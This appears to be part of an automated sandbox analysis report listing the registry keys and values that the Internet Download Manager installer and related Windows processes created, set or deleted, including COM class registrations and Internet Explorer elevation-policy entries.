| Key created | \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\Low Rights\DragDrop\{F6E1B27E-F2DA-4919-9DBD-CAB90A1D662B} | C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{E0DACC63-037F-46EE-AC02-E4C7B0FBFEB4}\AppName = "IDMan.exe" | C:\Program Files (x86)\Internet Download Manager\IDMan.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{E0DACC63-037F-46EE-AC02-E4C7B0FBFEB4}\Policy = "3" | C:\Program Files (x86)\Internet Download Manager\IDMan.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000\Software\Microsoft\Internet Explorer\Low Rights\DragDrop\{19129CDA-AFC0-4330-99BC-C5A834F89006} | C:\Program Files (x86)\Internet Download Manager\IDMan.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{E0DACC63-037F-46EE-AC02-E4C7B0FBFEB4}\AppName = "IDMan.exe" | C:\Program Files (x86)\Internet Download Manager\IDMan.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy | C:\Program Files (x86)\Internet Download Manager\IDMan.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote | C:\Program Files (x86)\Internet Download Manager\IDMan.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{1902485B-CE75-42C1-BA2D-57E660793D9A}\AppName = "IEMonitor.exe" | C:\Program Files (x86)\Internet Download Manager\IDMan.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{15B851AF-A4B9-43EF-97D3-28E1B4A5DB9B}\Policy = "3" | C:\Program Files (x86)\Internet Download Manager\idmBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{E0DACC63-037F-46EE-AC02-E4C7B0FBFEB4}\Policy = "3" | C:\Program Files (x86)\Internet Download Manager\IDMan.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{E0DACC63-037F-46EE-AC02-E4C7B0FBFEB4}\AppName = "IDMan.exe" | C:\Program Files (x86)\Internet Download Manager\IDMan.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000\Software\Microsoft\Internet Explorer\MenuExt\Download with IDM | C:\Program Files (x86)\Internet Download Manager\IDMan.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{E0DACC63-037F-46EE-AC02-E4C7B0FBFEB4}\Policy = "3" | C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{1902485B-CE75-42C1-BA2D-57E660793D9A}\Policy = "3" | C:\Program Files (x86)\Internet Download Manager\IDMan.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{1902485B-CE75-42C1-BA2D-57E660793D9A}\AppPath = "C:\\Program Files (x86)\\Internet Download Manager" | C:\Program Files (x86)\Internet Download Manager\IDMan.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\Low Rights\DragDrop | C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel | C:\Program Files (x86)\Internet Download Manager\IDMan.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{1902485B-CE75-42C1-BA2D-57E660793D9A}\AppPath = "C:\\Program Files (x86)\\Internet Download Manager" | C:\Program Files (x86)\Internet Download Manager\IDMan.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{15B851AF-A4B9-43EF-97D3-28E1B4A5DB9B} | C:\Program Files (x86)\Internet Download Manager\idmBroker.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\DragDrop\{F6E1B27E-F2DA-4919-9DBD-CAB90A1D662B}\AppPath = "C:\\Program Files (x86)\\Internet Download Manager" | C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{E0DACC63-037F-46EE-AC02-E4C7B0FBFEB4} | C:\Program Files (x86)\Internet Download Manager\IDMan.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000\Software\Microsoft\Internet Explorer\Low Rights\DragDrop\{19129CDA-AFC0-4330-99BC-C5A834F89006}\AppPath = "C:\\Program Files (x86)\\Internet Download Manager" | C:\Program Files (x86)\Internet Download Manager\IDMan.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{1902485B-CE75-42C1-BA2D-57E660793D9A}\AppName = "IEMonitor.exe" | C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000\Software\Microsoft\Internet Explorer\Low Rights\DragDrop\{19129CDA-AFC0-4330-99BC-C5A834F89006} | C:\Program Files (x86)\Internet Download Manager\IDMan.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel | C:\Program Files (x86)\Internet Download Manager\IDMan.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000\Software\Microsoft\Internet Explorer\Low Rights\DragDrop | C:\Program Files (x86)\Internet Download Manager\IDMan.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{1902485B-CE75-42C1-BA2D-57E660793D9A}\Policy = "3" | C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy | C:\Program Files (x86)\Internet Download Manager\idmBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000\Software\Microsoft\Internet Explorer\Low Rights\DragDrop\{19129CDA-AFC0-4330-99BC-C5A834F89006}\AppPath = "C:\\Program Files (x86)\\Internet Download Manager" | C:\Program Files (x86)\Internet Download Manager\IDMan.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = 99ebff004cc2ff000091f8000078d4000067c000003e9200001a6800f7630c00 | C:\Windows\system32\LogonUI.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292114432" | C:\Windows\system32\LogonUI.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292114432" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365268" | C:\Windows\system32\LogonUI.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365268" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "203" | C:\Windows\system32\LogonUI.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4290799360" | C:\Windows\system32\LogonUI.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10" | C:\Windows\system32\LogonUI.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1" | C:\Windows\system32\LogonUI.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0" | C:\Windows\system32\LogonUI.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\system32\DrvInst.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1" | C:\Windows\system32\LogonUI.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{72B7361C-3568-4392-BCCD-D912CD5C1169}\ = "IV2LinkProcessor" | C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4764030F-2733-45B9-AE62-3D1F4F6F2861} | C:\Program Files (x86)\Internet Download Manager\IDMan.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{37294E01-DB54-43AF-9D50-93FF7267DF5D}\1.0\HELPDIR | C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0055C089-8582-441B-A0BF-17B458C2A3A8}\Programmable | C:\Program Files (x86)\Internet Download Manager\IDMIntegrator64.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{52F6F7BD-DF73-44B3-AE13-89E1E1FB8F6A}\TypeLib | C:\Program Files (x86)\Internet Download Manager\IDMIntegrator64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0055C089-8582-441B-A0BF-17B458C2A3A8}\ProgID\ = "IDMIECC.IDMIEHlprObj.1" | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{37294E01-DB54-43AF-9D50-93FF7267DF5D}\1.0\0\win32\ = "C:\\Program Files (x86)\\Internet Download Manager\\IDMGetAll.dll" | C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{C950922F-897A-4E13-BA38-66C8AF2E0BF7}\ = "PSFactoryBuffer" | C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{37294E01-DB54-43AF-9D50-93FF7267DF5D}\1.0\0\win32\ = "C:\\Program Files (x86)\\Internet Download Manager\\IDMGetAll.dll" | C:\Program Files (x86)\Internet Download Manager\IDMan.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CDD67718-A430-4AB9-A939-83D9074B0038}\InprocServer32\ = "C:\\Program Files (x86)\\Internet Download Manager\\downlWithIDM.dll" | C:\Program Files (x86)\Internet Download Manager\IDMan.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0055C089-8582-441B-A0BF-17B458C2A3A8}\ProgID | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{5312C54E-A385-46B7-B200-ABAF81B03935}\InprocServer32\ = "C:\\Program Files (x86)\\Internet Download Manager\\IDMGetAll64.dll" | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Idmfsa.IDMEFSAgent\CLSID\ = "{0F947660-8606-420A-BAC6-51B84DD22A47}" | C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{52F6F7BD-DF73-44B3-AE13-89E1E1FB8F6A}\Version | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{7D11E719-FF90-479C-B0D7-96EB43EE55D7}\ProgID\ = "DownlWithIDM.IDMDwnlMgr.1" | C:\Windows\system32\regsvr32.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CDD67718-A430-4AB9-A939-83D9074B0038}\Programmable | C:\Program Files (x86)\Internet Download Manager\IDMan.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{13D4E387-BAB7-47E7-B3D7-3F01ABC463EA}\1.0\FLAGS\ = "0" | C:\Program Files (x86)\Internet Download Manager\idmBroker.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{6EDC7F8E-EB3D-4F9A-B693-216F07C94D74}\ProxyStubClsid32\ = "{C950922F-897A-4E13-BA38-66C8AF2E0BF7}" | C:\Program Files (x86)\Internet Download Manager\IDMan.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\IDMIECC.IDMIEHlprObj\CurVer\ = "IDMIECC.IDMIEHlprObj.1" | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{436D67E1-2FB3-4A6C-B3CD-FF8A41B0664D}\ = "IDMHelperLinksStorage Class" | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{7D11E719-FF90-479C-B0D7-96EB43EE55D7}\InprocServer32 | C:\Program Files (x86)\Internet Download Manager\IDMIntegrator64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{436D67E1-2FB3-4A6C-B3CD-FF8A41B0664D}\InprocServer32\ = "C:\\Program Files (x86)\\Internet Download Manager\\IDMIECC64.dll" | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{7D11E719-FF90-479C-B0D7-96EB43EE55D7}\ = "IDMDwnlMgr Class" | C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{52F6F7BD-DF73-44B3-AE13-89E1E1FB8F6A}\MiscStatus\1 | C:\Program Files (x86)\Internet Download Manager\IDMan.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{436D67E1-2FB3-4A6C-B3CD-FF8A41B0664D}\Programmable | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{7D11E719-FF90-479C-B0D7-96EB43EE55D7}\InprocServer32\ThreadingModel = "Apartment" | C:\Program Files (x86)\Internet Download Manager\IDMan.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4764030F-2733-45B9-AE62-3D1F4F6F2861}\TypeLib | C:\Program Files (x86)\Internet Download Manager\IDMan.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0055C089-8582-441B-A0BF-17B458C2A3A8}\VersionIndependentProgID | C:\Program Files (x86)\Internet Download Manager\IDMan.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0055C089-8582-441B-A0BF-17B458C2A3A8}\Programmable | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{5312C54E-A385-46B7-B200-ABAF81B03935}\Programmable | C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4764030F-2733-45B9-AE62-3D1F4F6F2861}\ = "V2LinkProcessor Class" | C:\Program Files (x86)\Internet Download Manager\IDMan.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{C950922F-897A-4E13-BA38-66C8AF2E0BF7} | C:\Program Files (x86)\Internet Download Manager\IDMan.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{5312C54E-A385-46B7-B200-ABAF81B03935}\ProgID\ = "IDMGetAll.IDMAllLinksProcessor.1" | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{5312C54E-A385-46B7-B200-ABAF81B03935}\InprocServer32 | C:\Program Files (x86)\Internet Download Manager\IDMan.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CDD67718-A430-4AB9-A939-83D9074B0038}\ProgID | C:\Program Files (x86)\Internet Download Manager\IDMIntegrator64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{7D11E719-FF90-479C-B0D7-96EB43EE55D7}\TypeLib | C:\Windows\system32\regsvr32.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{436D67E1-2FB3-4A6C-B3CD-FF8A41B0664D} | C:\Program Files (x86)\Internet Download Manager\IDMan.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{ECF21EAB-3AA8-4355-82BE-F777990001DD}\1.0\0\win32\ = "C:\\Program Files (x86)\\Internet Download Manager\\IDManTypeInfo.tlb" | C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{33AEF752-FB86-4787-9ED1-6010528F5FA3}\ = "IIDMAllLinksProcessor" | C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0055C089-8582-441B-A0BF-17B458C2A3A8}\TypeLib\ = "{3BDFC55C-ED33-43BB-9A77-57C2AF4B56EF}" | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\IDMGetAll.IDMAllLinksProcessor\ = "IDMAllLinksProcessor Class" | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{2223E76A-0894-4502-841F-0CF7517A713B}\ProxyStubClsid32 | C:\Program Files (x86)\Internet Download Manager\idmBroker.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CDD67718-A430-4AB9-A939-83D9074B0038}\ProgID | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{52F6F7BD-DF73-44B3-AE13-89E1E1FB8F6A}\MiscStatus\ = "0" | C:\Program Files (x86)\Internet Download Manager\IDMan.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{7D11E719-FF90-479C-B0D7-96EB43EE55D7}\InprocServer32\ThreadingModel = "Apartment" | C:\Program Files (x86)\Internet Download Manager\IDMan.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CDD67718-A430-4AB9-A939-83D9074B0038}\VersionIndependentProgID | C:\Program Files (x86)\Internet Download Manager\IDMan.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{6B9EB066-DA1F-4C0A-AC62-01AC892EF175}\ProxyStubClsid32\ = "{C950922F-897A-4E13-BA38-66C8AF2E0BF7}" | C:\Program Files (x86)\Internet Download Manager\IDMan.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\DownlWithIDM.V2LinkProcessor.1\ = "V2LinkProcessor Class" | C:\Program Files (x86)\Internet Download Manager\IDMan.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F947660-8606-420A-BAC6-51B84DD22A47}\ProgID | C:\Program Files (x86)\Internet Download Manager\IDMan.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{5312C54E-A385-46B7-B200-ABAF81B03935}\ProgID | C:\Program Files (x86)\Internet Download Manager\IDMIntegrator64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CDD67718-A430-4AB9-A939-83D9074B0038}\InprocServer32\ = "C:\\Program Files (x86)\\Internet Download Manager\\downlWithIDM64.dll" | C:\Program Files (x86)\Internet Download Manager\IDMIntegrator64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\DownlWithIDM.LinkProcessor\ = "LinkProcessor Class" | C:\Windows\system32\regsvr32.exe | N/A |
